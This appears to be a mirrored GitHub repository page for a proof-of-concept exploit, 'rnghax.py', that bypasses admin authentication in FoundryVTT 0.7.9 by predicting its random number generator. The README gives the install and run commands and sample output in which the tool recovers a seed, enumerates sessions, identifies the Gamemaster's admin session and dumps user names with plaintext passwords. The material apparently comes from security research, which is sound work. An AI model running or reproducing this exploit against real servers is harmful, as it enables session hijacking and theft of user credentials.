Giters

sum-catnip / foundry-rnghax

foundryvtt admin authentication bypass POC exploit

Home Page:http://catnip.fyi/posts/foundry-p3/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

authentication-bypassexploitfoundry-vttpocsecurity

FoundryVTT admin authenttication bypass

For more info, read this blogpost. This repo contains the POC exploit to crack an admin session (rnghax.py) and also a file i used to calculate the accurracy of my base64 decode (riddec_stonks.py).

Install the deps like:

pip install -r requirements.txt

and run it like:

❯  python rnghax.py http://localhost:30000
server running foundry 0.7.9
data path at /home/catnip/.local/share/FoundryVTT
trying with tokens: ['db8x4llkgsqip7deh42cqrj3', '1puya3xxss9ftryt3x1zprlu']
found seed: 9993270706845480418:11192517990384452169
looking for sessions
----
found following sessions:
rid: ji38xvzub5j34pbd8vfksowi
rid: 1puya3xxss9ftryt3x1zprlu
rid: db8x4llkgsqip7deh42cqrj3
rid: fgo1aa8w635pk7bw44kkt35e
admin! rid: tmcg42wsw3g99fn55oyeciv6 uid: yYMaJwcVCcqJN09P name: Gamemaster password:
----
found following users:
uid: 9QMfMfcKwjnU0lQ7 name: lit password: af role: 2
uid: FGWnyV4lH2KmuRzd name: salad password: kektop role: 1
uid: R8xJ9pkyBP54OIsN name: memes password: topkek role: 1
uid: iGNzDi9gdSeZfgZH name: yeet password: top role: 1
uid: yYMaJwcVCcqJN09P name: Gamemaster password:  role: 4

About

foundryvtt admin authentication bypass POC exploit

http://catnip.fyi/posts/foundry-p3/

authentication-bypassexploitfoundry-vttpocsecurity

Languages

Language:Python 100.0%